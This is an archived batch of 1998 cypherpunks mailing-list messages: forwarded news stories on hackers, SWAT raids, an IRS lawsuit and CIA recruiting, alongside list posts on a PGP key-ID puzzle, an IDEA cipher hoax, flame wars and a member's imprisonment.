telecommunication companies investigated and arrested many of them during
the late 1980s and early '90s. 

 Today, many elite hackers of the past are making a go at legitimate work,
getting paid big bucks by Fortune 500 companies to explore computer
networks and find the weak spots. 

 And none too soon. The void left by the old hackers has been filled by a
new, more destructive generation. 

 So today, Mudge - who uses a pseudonym like others in the hacker
community, a world where anonymity keeps you out of trouble - wears a white
hat. As part of L0pht, the hacker think tank, he and six comrades hole up
in a South End loft space in Boston and spend their evenings peeling open
software and computer networks to see how they work. 

 When they find vulnerabilities in supposedly secure systems, they publish
their findings on the World Wide Web in hopes of embarrassing the companies
into fixing the problems. A recent example: They posted notice via the
Internet of a problem that makes Lotus Notes vulnerable to malicious hackers. 

 A Lotus spokesman said the company was aware of the flaw but it was
extremely technical and unlikely to affect anyone. 

 The hackers at L0pht have made enemies among industry people, but they
command respect. They were even called to testify before the U.S. Senate
Committee on Governmental Affairs in May. 

 Why do they publish what they find? 

 "If that information doesn't get out,'' Mudge replies, "then only the bad
guys will have it.'' 

 The "bad guys'' are the hacker cliche: secretive teen-age boys lurking
online, stealing credit card numbers, breaking into Pentagon systems, and
generally causing trouble. One of L0pht's members, Kingpin, was just such a
cad when he was younger, extending his online shenanigans to real-world
breaking and entering. Today, L0pht keeps him out of mischief, he said. 

 "We're like midnight basketball for hackers,'' said Weld Pond, another
member. 

 Malicious hacking seems to be on the rise. 

 Nearly two out of three companies reported unauthorized use of their
computer systems in the past year, according to a study by the Computer
Security Institute and the FBI. Another study, from Software AG Americas,
said 7 percent of companies reported a "very serious'' security breach, and
an additional 16 percent reported "worrisome'' breaches. However, 72
percent said the intrusions were relatively minor with no damage. 

 American companies spent almost $6.3 billion on computer security last
year, according to research firm DataQuest. The market is expected to grow
to $13 billion by 2000. 

 Government computers are vulnerable, too. The Defense Department suffered
almost 250,000 hacks in 1995, the General Accounting Office reported. Most
were detected only long after the attack. 

 This is why business booms for good-guy hackers. 

 Jeff Moss, a security expert with Secure Computing Inc., runs a
$995-a-ticket professional conference for network administrators, where
hackers-cum-consultants mingle with military brass and CEOs. 

 "I don't feel like a sellout,'' said Moss, who wouldn't elaborate on his
hacking background. "People used to do this because they were really into
it. Now you can be into it and be paid.'' 

 News reports show why such services are needed: 

 - Earlier this month, hackers struck the Web site of The New York Times,
forcing the company to shutter it for hours. Spokeswoman Nancy Nielsen said
the break-in was being treated as a crime, not a prank. The FBI's computer
crime unit was investigating. 

 - This spring, two California teen-agers were arrested for trying to hack
the Pentagon's computers. Israeli teen Ehud Tenebaum, a k a "The
Analyzer,'' said he mentored the two on how to do it. The two Cloverdale,
Calif., youths pleaded guilty in late July and were placed on probation. 

 - Kevin Mitnick, the only hacker to make the FBI's Ten Most Wanted list,
was arrested in 1995, accused of stealing 20,000 credit card numbers. He
remains in prison. A film called "TakeDown,'' about the electronic
sleuthing that led to Mitnick's capture, is in the works. Comments
protesting Mitnick's prosecution were left during the hack of the New York
Times Web site. 

 - In 1994, Vladimir Levin, a graduate of St. Petersburg Tekhnologichesky
University, allegedly masterminded a Russian hacker gang and stole $10
million from Citibank computers. A year later, he was arrested by Interpol
at Heathrow airport in London. 

 "Lemme tell ya,'' growled Mark Abene one night over Japanese steak
skewers. "Kids these days, they got no respect for their elders.'' 

 Abene, known among fellow hackers as Phiber Optik, should know. He was one
of those no-account kids in the 1980s when he discovered telephones and
computers. For almost 10 years, he wandered freely through the nation's
telephone computer systems and, oh, the things he did and saw. 

 Celebrities' credit reports were his for the taking. Unlimited free phone
calls from pilfered long-distance calling card numbers. Private phone lines
for his buddies, not listed anywhere. And the arcane knowledge of trunk
lines, switches, the entire glory of the network that connected New York
City to the rest of the world. 

 But Abene's ticket to ride was canceled in January 1994, when, at age 22,
he entered Pennsylvania's Schuylkill Prison to begin serving a
year-and-a-day sentence for computer trespassing. The FBI and the Secret
Service described him as a menace. The sentencing judge said Abene, as a
spokesman for the hacking community, would be made an example. 

                  (c) 1998 Associated Press. All rights reserved.
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sat, 19 Sep 1998 21:45:20 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Use of SWAT Teams on the Rise
Message-ID: <199809200247.TAA12067@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: Use of SWAT Teams on the Rise
Date: Sat, 19 Sep 1998 12:11:32 -0500
To: believer@telepath.com

Source:  Charlotte (N.Carolina) Observer
http://www.charlotte.com/observer/local/pub/031225.htm

Published Saturday, September 19, 1998 

SWAT team approach less risky, police say
Use of squads on rise around region, nation

 By LEIGH DYER 
 Staff Writer 

Across the country, police departments are using SWAT teams to deal with
high-risk situations like the Sept. 4 drug raid that ended with a Charlotte
man dead.

Court papers said police were looking for evidence of drug dealing, but
they found no drugs in the Mayfair Avenue home.

Charlotte-Mecklenburg police say the paramilitary-style squad reduces the
risks to officers and the public in dangerous situations. But some critics
say using the SWAT team for search warrants is too heavy-handed.
 
Records show the Charlotte-Mecklenburg team is used sparingly. Last year,
SWAT officers were involved in 14 of the 441 warrants served by
Charlotte-Mecklenburg police. Of 251 warrants executed from January to Aug.
31, SWAT team members served 15.

Of the 29 raids before Charles Irwin Potts' death, one resulted in minor
injuries. Potts' death is the first shooting during a search warrant since
the team organized in 1992.

It's less clear how often the team succeeds in finding what it's after. In
almost every raid, the team reports either an arrest or a seizure of
weapons or drugs. But they don't always seize the goods they were looking for.

The Sept. 4 raid netted three guns and gambling equipment -- but no
evidence of the cocaine dealing an informant told them they'd find.

Maj. Piper Charles, who is in charge of the Charlotte-Mecklenburg team,
said that when the team is used is not based on the likelihood of finding
drugs. Instead, it's based on the likelihood of facing armed resistance.

``The primary purpose is to save lives,'' said Charles. ``A successful
mission is one in which absolutely no one gets hurt.''

More scrutiny

SWAT calls range from negotiation with hostage-takers to quelling riots to
raids for guns, drugs or evidence of other criminal activity. 

The 42-member Charlotte-Mecklenburg Special Weapons and Tactics team uses
special equipment, including heavy body armor and laser-sighted guns. The
duty is part time. Team members are also assigned to other regular patrol
duties.

Nationally, the increased use of SWAT teams has drawn praise from those who
say their tactics are safer than traditional law--enforcement methods. 

But Peter Kraska, a criminology professor at Eastern Kentucky University
who has tracked SWAT teams, said they have a downside.

``Often when you see them in a neighborhood piling out of a vehicle . . .
it gives the community an impression they're kind of under siege,'' he said. 

Regionally, SWAT teams have become more active in counties including
Gaston, Union and Cabarrus in recent years. Sgt. Jeff Eisenhour, commander
of the Gaston County Police SWAT team, said most operations go more
smoothly with such a well-trained team, rather than regular patrol officers.

``The biggest advantage is the training,'' he said. ``Everybody knows what
everyone is doing.''

The Potts shooting has put the methods and policies of the SWAT team under
a microscope, said Charlotte-Mecklenburg's Charles. Those methods include
the use of ``flash-bangs,'' a diversionary device thrown into a room to
stun and distract occupants with a bang and bright lights while SWAT team
members storm in.

``My position is that you're not going to find a safer way to do it,''
Charles said.

As SWAT teams grow in popularity, they have encountered more questions
about their use. In Fitchburg, Mass., west of Boston, civil libertarians
criticized a SWAT team after its members arrested a group of young men in
1993 for lingering on a sidewalk.

And in Louisville, Ky., family members of a man killed in a SWAT raid in
March 1997 sued, challenging the police procedures. The suit alleges that a
flash-bang may have disoriented the man so much he didn't realize he was
pointing his gun at police officers. The suit is pending.

In Charlotte-Mecklenburg, though, officers say the devices may have saved
lives many times, including during a raid on Jan. 22 when a suspect dropped
a gun after a flash-bang went off.

``I have heard that sometimes people are not properly using their SWAT
teams,'' said Roy House, an instructor at Central Piedmont Community
College who conducts regional SWAT training. ``That's a leadership problem.''

House, who is also a reserve member of the Charlotte-Mecklenburg team,
believes the benefits of the teams outweigh any criticism.

``I would think it's better to go in there and be a little heavy-handed
than to go in there and be outnumbered . . . or outgunned,'' he said. 
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sat, 19 Sep 1998 21:56:47 +0800
To: cypherpunks@cyberpass.net
Subject: IP: IRS, White House above the law? by Joseph Farah
Message-ID: <199809200247.TAA12078@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: Jan <igniting@flash.net>
Subject: IP: IRS, White House above the law? by Joseph Farah
Date: Sat, 19 Sep 1998 19:54:10 -0500
To: Ignition-Point <ignition-point@majordomo.pobox.com>

Date: Fri, 18 Sep 1998 14:31:36 -0600
From: Robert Huddleston <cabhop@highfiber.com>
Subject: IRS, White House above the law? by Joseph Farah 

between the lines
by Joseph Farah
FRIDAY SEPTEMBER 18, 1998
http://www.worldnetdaily.com/btlines/980918_btl_irs_white_house.html

IRS, White House above the law? 
                   
Last week, we had our first court hearing in our
$10 million lawsuit against White House and
Internal Revenue Service officials we believe
conspired to use their government power to
harass and intimidate my organization, the
Western Journalism Center, for exposing Clinton
administration scandals for the last four years. 

This was a procedural hearing in Sacramento
before U.S. Judge Milton Schwartz, a Carter
appointee, who seemed to be preparing the Justice
Department attorney from Washington and our
counsel from Larry Klayman's Judicial Watch for a
major trial. 

Nevertheless, the government is trying to abort
this trial on the kind of familiar technical grounds
we have come to expect from this administration.
Interestingly, the Justice Department has yet to
dispute the major claims of our case -- that the
center was the victim of a politically motivated
audit designed to squelch our First Amendment
rights. 

The Justice Department is claiming the one-year
statute of limitations expired before we filed the
suit. Not true. By any standard, we filed in plenty
of time. The audit of our organization ended in
May 1997. We were not officially notified until
June of 1997. No tax-exempt organization in its
right mind would sue the IRS during an audit. We
filed the lawsuit in May of 1998 within one year of
the audit being closed. 

The Justice Department is claiming an argument
you've heard before from the administration -- that
there is "no controlling legal authority" and, thus,
no legislative remedy for organizations victimized
by political audits. In other words, the president is
free to use the IRS to go after his "enemies" and
there is no punitive action the victim can take
against him or the agents with whom he conspires.

Next week, the Justice Department attorneys will
be back in U.S. District Court in Sacramento to ask
Judge Schwartz to dismiss the case on these
specious grounds. 

I want to go on record right now as saying that no
matter how the judge rules on this motion, the
Western Journalism Center will not stop in
pressing this matter for adjudication and remedy.
This is a case far too important to the future of this
country and the rule of law to allow it to be dropped. 

Let's review the basic facts. In 1994, the center
began investigating Clinton administration
corruption. By December 1994, memos released to
congressional investigators show that the White
House counsel's office had begun targeting the
center for action of some kind. In 1995, the center
was a major focus of a White House counsel's
office 331-page report called the Communication
Stream of Conspiracy Commerce. I was the only
journalist profiled in this mammoth report
alleging a wide-ranging media conspiracy against
the president. In early 1996, I first began hearing
rumors that my organization was being targeted
by the IRS. Months later, we were notified that we
were under audit and that our tax-exempt status
was under scrutiny because of the nature of our
investigative work into Clinton administration
corruption during an election year. 
When we questioned the IRS agent about his
authority to interfere in our First
Amendment-protected activities, he said: "Look,
this is a political case, and the decision will be
made at the national level." 

We then exposed this blatant abuse of the IRS
against our organization and the pattern of
politically motivated audits against other
non-profits in the pages of the Wall Street Journal.
As a result, Congress began an investigation, and
IRS Commissioner Margaret Milner Richardson
resigned. Ultimately, the agent in charge was
removed from the case, investigated internally by
the IRS and a new agent assigned. The nine-month
audit was then closed within two days. 

We demanded our case file, which the "Taxpayer
Bill of Rights" states is available to any taxpayer
following an audit. It was denied. We then filed a
Freedom of Information Act request for it. Again it
was denied. The IRS stated that the file would be
withheld because it had been through the hands of 
others within the IRS and possibly outside of the
agency and was, thus, protected by "governmental
privilege." 

Having exhausted every available means to
document our growing conviction that we were
targeted for political reasons, we filed suit. 

If you believe, as I do, that this is a monumentally
important case, I ask for your sincere and
unceasing intercessory prayers that justice will be
done. 
                   

                    A daily radio broadcast adaptation of Joseph Farah's
                    commentaries can be heard at http://www.ktkz.com/ 

Joseph Farah  is editor of WorldNetDaily.com 
and executive director of the Western Journalism Center, 
an independent group of investigative reporters. 

 <@{{><   <@{{><   <@{{><   <@{{><   <@{{><   <@{{><   <@{{><

SOCIALIST
 1. socialism
   ( Noun ]
     : social organization based on goverment control of the
production and distribution of goods.
                                *****

*************************************************
"But if the watchman sees the sword coming and does not blow the trumpet to
warn the people and the sword comes and takes the life of one of them, that
man will be taken away because of his sin, but I will hold the watchman
accountable for his blood."
Ezekiel 33:6 (NIV)
___________________________________________________________
New toll-free hotline to Congress 
Congress is making a new toll-free number available for
citizens who would like to make their voices heard in
Washington.      1-800-504-0031 
Ask for your Congressman office and let him know
what you think.............
---------------------------------------------------------------
Join Gun Owners of America [ GOA ] today.
Read more about GOA at :     http://www.gunowners.org/
--------------------------------------------------------------
Jews for the Preservation of Firearms Ownership (JPFO)
Become a JPFO member, go to: http://www.jpfo.org/member.htm
There you will see a printable member application, along with
info on membership Membership IS open to ALL Law
abiding citizens.
---------------------------------------------------------------

<@{{><   <@{{><   <@{{><   <@{{><   <@{{><   <@{{><   <@{{><
 ******=========================================*****
"Among the elementary measures the American Soviet government
 will adopt to further the cultural revolution are...
 [a] National Department of Education...the studies will be
 revolutionized, being cleansed of religious, patriotic, and
 other features of the bourgeois ideology. The students will
 be taught the basis of Marxian dialectical materialism,
 internationalism and the general ethics of the
 new Socialist society."
     - William Z. Foster,
       Toward Soviet America, 1932

"...Stage III...would proceed to a point where no state would
have the military power to challenge the progressively 
strengthened U.N. peace force...
The manufacture of armaments would be prohibited...
All other armaments would be destroyed..." 
    -Department of State publication number 7277




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sat, 19 Sep 1998 21:56:03 +0800
To: cypherpunks@cyberpass.net
Subject: IP: [Spooks] CIA Losing Its Best Operatives
Message-ID: <199809200247.TAA12088@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: Bridget973@aol.com
Subject: IP: [Spooks] CIA Losing Its Best Operatives
Date: Sat, 19 Sep 1998 21:43:13 EDT
To: ignition-point@majordomo.pobox.com

Subject: 
        [Spooks] CIA Losing Its Best Operatives
   Date: 
        Wed, 16 Sep 1998 22:51:13 -0500
   From: 
        Bob Margolis <rttyman@wwa.com>
     To: 
        Spooks <spooks@qth.net>




WASHINGTON (AP) -- The CIA is pumping money and people into  
recruiting efforts to battle a trend that the agency's departing 
inspector general says has sapped the clandestine service of its 
most experienced hands. 
        Agency officials outlined Tuesday initiatives that CIA Director
George Tenet announced internally last month to increase pay, 
provide hiring bonuses and shorten the waiting time for job offers. 
        ``There are plenty of headhunters out there ready to pounce on  
strong candidates,'' Tenet told agency employees in his 
announcement. ``To delay is to lose.'' 
        The program is intended to combat a problem outlined in an op-ed  
article by outgoing CIA Inspector General Fred Hitz who said the 
CIA's Directorate of Operations, the clandestine spy service, is 
losing its best people amid organizational drift and declining 
morale. 
        ``The picture is not encouraging,'' said Hitz, the CIA's chief  
watchdog from 1990 until this year. Writing in an op-ed article in 
The Washington Post, Hitz said the Directorate of Operations ``has 
been shrinking in size and capability since the end of the Cold 
War.'' 
        A recent study showed departures from the agency due to  
attrition ``involved high-quality officers the agency could not 
afford to lose,'' Hitz wrote. 
        The number of CIA employees is classified, but the Federation of
American Scientists, a Washington-based group that follows 
intelligence matters, estimates it has shrunk from more than 20,000 
to about 16,000 since the Cold War. The clandestine service is 
estimated at several thousand. 
        Agency and congressional officials said the critique may be  
outdated as the CIA pumps new money and energy into recruiting. But 
one knowledgeable congressional staffer said the problem got so bad 
that an entire incoming class of operatives -- perhaps a few dozen 
recruits -- had to be canceled for lack of money. 
        Hitz pointed to the difficulty of recruiting in a booming  
economy and to low morale as a result of ``the lack of a clear 
mission'' at CIA. 
        ``Nobody worth his or her salt is going to join an organization
that has lost faith in itself, is confused about its mission and is 
trapped in the sclerosis of a middle-aged bureaucracy,'' he said. 
        Rep. Porter Goss, R-Fla., chairman of the House Intelligence  
Committee and a former CIA clandestine operative, said an instinct 
to blame the CIA every time a risky intelligence venture fails is 
taking its toll. 
        ``With so many unyielding critics, the CIA has become gun-shy,''
Goss said. 
        Sen. Bob Kerrey, D-Neb., vice chairman of the Senate  
Intelligence Committee, said Hitz has been a leading critic of the 
clandestine service and may himself be partly to blame for low 
morale. Still, Kerrey agreed recruitment is a serious agency 
problem. 
        Sen. Richard Shelby, R-Ala., the committee chairman, said the  
CIA must focus more clearly on defining its mission and outlining 
how it will use field operatives to combat terrorism, weapons 
proliferation and drug trafficking. 
        In recent months, the House and Senate Intelligence Committees  
have pushed for more money for the CIA's so-called human 
intelligence efforts, including its field operatives. 
-=-=-    
                           AP NEWS
               The Associated Press News Service
             Copyright 1998 by The Associated Press
                      All Rights Reserved

---
Submissions should be sent to spooks@qth.net
To unsubscribe, send "unsubscribe spooks" to majordomo@qth.net


--
bridget973@aol.com
Black Helicopters on the Horizon:
http://members.xoom.com/bridget973






**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sat, 19 Sep 1998 12:58:04 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Oh my God...
Message-ID: <199809191800.UAA27494@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



>And thank you for reminding me to keep my lowly political stuff off of the
>"good" lists....I needed that reminder to keep my filth here on
>"cypherpunks."

Poor little Timmy, still crying boo-hoo because someone dared to set up
another list than his little cypherpunks fiefdom.  He loves to talk about
freedom of association if it means that he doesn't have to be around
"Coloreds".  But he can't stand people setting up a forum to focus more
on cryptography.  What a hypocrite.

> Well, if Ron Brown is put in jail they'll have to dig up the casket
> containing the couple of pounds of what they found of him when his plane
> hit that hillside near Sarajevo a couple of years ago.

Gee, and I thought they'd found possible bullet holes in Ron Brown's head?
Need more than a couple of pounds for that, wouldn't they?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sat, 19 Sep 1998 13:44:34 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Larry Gilbert, AOLers, and the Hyper-real flamer
Message-ID: <199809191846.UAA31551@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



(Depreciated toad.com address replaced with algebra.com.)

On Sat, 19 Sep 1998 AIMSX@aol.com wrote:

> 
> wow.. you really do think I do all those things - spamming, mailbombing... and
> all that other huh?

No. Actually, we're convinced that you're just a lamer. Usually spamming
and mailbombing goes along with that. 

> You really give me way to much credit, as I only use it for internet access,
> and access to a UNIX machine

You need 100 accounts on the same ISP for that? Your implied claims of
being Internet savvy are pretty suspect considering that you haven't even
figured out how to quote yet. Besides, all having 100 accounts usually
means is that you installed a password sniffer on a university LAN or you
ran crack on a passwd file. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lcs Mixmaster Remailer <mix@anon.lcs.mit.edu>
Date: Sat, 19 Sep 1998 15:58:09 +0800
To: cypherpunks@cyberpass.net
Subject: Re: IP: School bans `no rules' T-shirt
Message-ID: <19980919210002.13986.qmail@nym.alias.net>
MIME-Version: 1.0
Content-Type: text/plain




This is more evidence of government trying to indoctrinate children. We
have the Pledge of Sheepegience, students encouraged to pressure anyone
who doesn't conform, school uniforms, clear backpacks, metal detectors,
kids being expelled for having asprin, and now students being "free" to
wear anything with a message, so long as it's a government-approved
message. 

On Sat, 19 Sep 1998, Vladimir Z. Nuri wrote:

> From: believer@telepath.com
> Subject: IP: School bans `no rules' T-shirt
> Date: Thu, 17 Sep 1998 09:25:30 -0500
> To: believer@telepath.com
> 
> Source:  St. Paul, Minnesota Pioneer Planet News
> http://www.pioneerplanet.com/news/wis_docs/010832.htm
> 
> Published: Thursday, September 17, 1998 
> 
> School bans `no rules' T-shirt
> 
> ASSOCIATED PRESS 
> 
>  WAUKESHA, WIS.
> 
> A fifth grader was ordered to turn his T-shirt inside-out because it
> carried the message ``No Rules,'' which the principal said promoted
> disruptive behavior.

What difference does it make? Schools aren't teaching kids to read anyway.
Obviously, they're still learning.

I suggest that we ban all literacy right now! It allows people to read
disruptive texts! Fahrenheit 451 forever! Ra ra ra!

> But the youth's mother said Saratoga Elementary School principal Dale
> Heinen overstepped his bounds and that there was no harm in wearing such
> shirts, which depict cartoon characters and carry the slogan, ``Outta my
> way. No Rules.''

One would think that the fact that it's being worn by a fifth grader, and
that it has cartoon characters on it would tend to make it more of a joke
than anything else.

> 
> Heinen made Cody Wilhelm wear the shirt inside-out so no one could read its
> message.

I guess that the kids of today aren't smart enough to read backwards
either.

> 
> ``School guidelines talk about things that are disruptive and can lead to
> disruption,'' Heinen said. ``If they are portraying that in what they wear
> . . . we don't want kids reflecting that attitude or promoting that type of
> attitude.''

Yes. You only want them to promote attitudes which cover the government
seal of approval.

> Mary Wilhelm said her son's T-shirt was not disruptive and that parents
> should have the right to dress their children with any clothes they want to
> as long as they do not promote sex, drugs, alcohol, tobacco or illegal
> activities. 

Oh, I get it. "Freedom for me, but not for thee." She's basically bitching
because she wasn't given the decision about what rights to abridge.

The funny thing about these people hating sex is that they do it, and if
people don't do it the species dies. The downright sad thing about the
"illegal activities" comment is that just about everything is illegal now,
but she's too stupid to realize it. 

> She said her son went to school last year wearing one of the ``No Rules''
> T-shirts and also wore a T-shirt depicting ``Joe Camel,'' a cartoon
> character formerly used to promote Camel cigarettes. School officials did
> not object, she said.

Wait! I thought Mary Wilhelm said that "parents should have the right to
dress their children with any clothes they want to as long as they do not
promote sex, drugs, alcohol, TOBACCO..."

> ``He should have never worn that Joe Camel shirt, I agree, but that dealt
> with smoking,'' Wilhelm said.

As opposed to "illegal activities." Well, at least as the school claims.

> ``This is different. I don't want to have the principal tell me what I can
> and can't do with my kid.''

But you want to be able to tell everybody else what they can and can't do
with their's.

People like this disgust me. That includes the principal and the mother.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@remailer.ch>
Date: Sat, 19 Sep 1998 16:21:40 +0800
To: Jim Choate <cypherpunks@cyberpass.net
Subject: Re: Clinton's fake apologies (fwd)
Message-ID: <19980919212126.20210.qmail@hades.rpini.com>
MIME-Version: 1.0
Content-Type: text/plain




Jim Choate wrote:
> 
> nobody@remailer.ch wrote:
> > Subject: Re: Clinton's fake apologies (fwd)
> 
> > Presumably he should lie to protect the state.
> 
> Then don't take the oath:
> 
> To tell the truth, the whole truth, and nothing but the truth.
> 
...

> > So lieing per se isn't the problem.
> 
> No, it's the fact that he took an oath to tell the truth and didn't.
> 
> > Murky water
> > for impeachment, methinks.
> 
> Then you don't think very well.
> 

What? To tell a lie is one thing, but if you preface it with "I'm telling the truth",
then that is really really bad? I still think you're drawing a very fine line.

I'm honoured to draw an ad hominem before revealing that I'm on AOL.

-- an anonymous aol32 user. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@acm.org>
Date: Sat, 19 Sep 1998 23:26:55 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Repost in text: IDEA(tm) weakness
In-Reply-To: <199809200116.DAA28107@replay.com>
Message-ID: <360484E7.11556EA4@acm.org>
MIME-Version: 1.0
Content-Type: text/plain



A quick review reveals that this is clearly another "PGP is broken"
hoax. The author is assuming that IDEA's * operation has a nonuniform
distribution of outputs given a uniform distribution of inputs. Since it
is taken mod 65537 (a prime), this is simply not the case - for constant
x, x * y mod 65537 is a permutation over y. Everything else flows from
this flawed assumption.

The rest of the post is silly as well. "Not tested on real PGP data
because I couldn't find where the IDEA data starts." Very funny, this
info is quite accessible. Also, posting the technique but witholding the
code is ridiculous. If the technique worked, it would get implemented
within hours.

Oh well. It was exciting for a minute or two.

Raph




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 19 Sep 1998 20:46:55 +0800
To: cypherpunks@cyberpass.net
Subject: CJ Update
Message-ID: <199809200148.VAA28141@camel7.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



>From Alia Johnson <lodi@well.com>, CJ's sister, today:

I'm writing to say that CJ has arrived at the Springfield Medical
Referral Center, where he will be held for a month or more (the 
phone says U.S.  Medical Center for Federal Prisoners) for 
"examination". 

Here is the address:  

            Carl E. Johnson
			Register # 05987-196
             U.S. Medical Center for Federal Prisoners
	          P.O. Box 4000
             Springfield, Missouri  65801

Also, to my delight, I received a letter from him today. He sounds okay.

CJ in his letter asks for physical mailing addresses for some of the
cypherpunks (no one specifically) so that he can send you things to 
post since I will be travelling.

[End Alia]

---------

We'll be happy to digitize and/or post any mail from CJ folks want to 
share, anonymous and/or encrypted always welcome:

Fax: 212-799-4003
Vox: 212-873-8700

Snail:

John Young
251 West 89th Steet, Suite 6E
New York, NY 10024

We've put all our PGP keys at: 

   http://jya.com/jya-keys.txt

And a bunch of keys for the wild bunch of Totos:

   http://jya.com/totos-keys.htm






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sat, 19 Sep 1998 14:53:03 +0800
To: cypherpunks@toad.com
Subject: Re: about hacking win95 passwords
Message-ID: <199809191946.VAA03649@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



David Parkinson wrote:

> 
> hello,
> 
> 	my name is david parkinson
> 
> i have taken a document of an ftp on how to hack win95 passwords
> 
> your email address was on it.  in the part where it says here is a 
> 
> guick hack and then this is what it shows

C source snipped.

> i have no idea what that means and how it can help me hack win95 
> 
> passwords.
> 
> if u could help we with this it would be greatly appreciated

Go to a bookstore and buy an introductory book on C programming. It might
cost as much as $50, but it is more than worth your while if you are
planning on messing with cryptography and cracking like this.

Once you have the book, read it and then try to analyze the source code. 
If you are dealing with and using Windows, you will need a C compiler. 
Cygnus has a free Win32 C compiler out as I understand it, and Microsoft
and Borland both have C compilers out for a few hundred bucks each.

If you are dealing with UNIX, there is tons of source and free development
utilities out there.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Sat, 19 Sep 1998 16:44:59 +0800
To: cypherpunks@cyberpass.net
Subject: Toto knows how to make a 0xdeadbeef attack?
Message-ID: <199809192107.WAA25895@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




As a result of my trawl through my cypherpunks archive last week
looking for publically posted private keys by Toto et al, I grepped
out a selection of encrypted messages sent to the list.  I thought I'd
have a go at decrypting these with the selection of passphrases John
Young posted earlier today, in case any were encrypted with the
publically posted keys, or with a conventional encryption key.

I came across this post [1] posted in 5 Sep 97 which contains this
encrypted message, and "challenge" to decrypt it.

Now if you try to decrypt it, it says you need key 0xE6A9C799, the
public key for which is on the key servers.  However keyids are
actually stored as 64 bits, internally to PGP messages, but only the
least significant 32 bits are displayed by PGP normally.  I use
pgpacket to look at things and it gives you all 64 bits, the message
has keyid:

	0xAA33463CE6A9C799

however the key I got off the keyserver [2] has keyid:

	0xAA33063CE6A9C799

which differs by 0x400000000000 or one bit.  That would require
knowing how to create a 0xdeadbeef key or at least use software to do
this, if it is available.

Unless the bit flip is part of the "challenge".  Who knows.

Toto did allude to hacking skills, though largely claimed ignorance.
I wonder if this was feigned, or if there are other Totos who are
doing the key hacks etc.  eg this challenge out of bureau42.ml.org
remailer.

Toto is a one man computer crypto forensics persons full-employment
insurance! -- the amount of stuff posted to the list with various
passwords, keys, etc.  The IRS guys must be either hiring some one who
knows crypto, or are going to be seriously confused at this point.
Then there's the use of S-Tools, they must be going boggle eyed
guessing passphrases for S-Tools for all the images ever posted
anonymously, or pseudonymously to the list.  One wonders almost if
this was his aim.

Any hints Toto(s)?  Firstly I haven't got the private key(s) for
0xAA33[0|4]63CE6A9C799, and secondly, what's the deal with the bit
flips/0xdeadbeef attacks?

My september forward secret key is below [3].  It is authenticated by
my high security key, and 12 days time or so, the private key gets
wiped.

Adam

[1]
======================================================================
Date: Fri, 5 Sep 1997 17:31:53 GMT
From: bureau42 Anonymous Remailer <remailer@bureau42.ml.org>
Comments: This message did not originate from the Sender address above.
        It was remailed automatically by anonymizing remailer software.
        Please report problems or inappropriate use to the
        remailer administrator at <remailer-admin@bureau42.ml.org>.
Subject: EFF $10,000,0000 Challenge
To: cypherpunks@toad.com
Sender: owner-cypherpunks@Algebra.COM
Precedence: bulk
X-Mailing-List: cypherpunks@algebra.com
X-List-Admin: ichudov@algebra.com
X-Loop: cypherpunks@algebra.com



The Electronic Forgery Foundation is proud to announce a major 
breakthrough in encryption technology -- Forged Encryption.

We are offering a prize of $10,000,000.00 for anyone who can
correctly decipher the following Forged Encryption message.

-----BEGIN PGP MESSAGE-----
Version: PGP for Personal Privacy 5.0
MessageID: od2CIT3fELE7K6bkIkKGJBj0MPUJ2TT8

hQCMA6ozRjzmqceZAQQAh02x0Dxer5vzZiSJ+v7bnMZQdgp425z5OH0NF/f/mXXc
vInw+UsuTXqWNEV5rEQKYjU3qHoe6suCz5f9hEEnOIBacsD28pYU4ahkGOCTuTY6
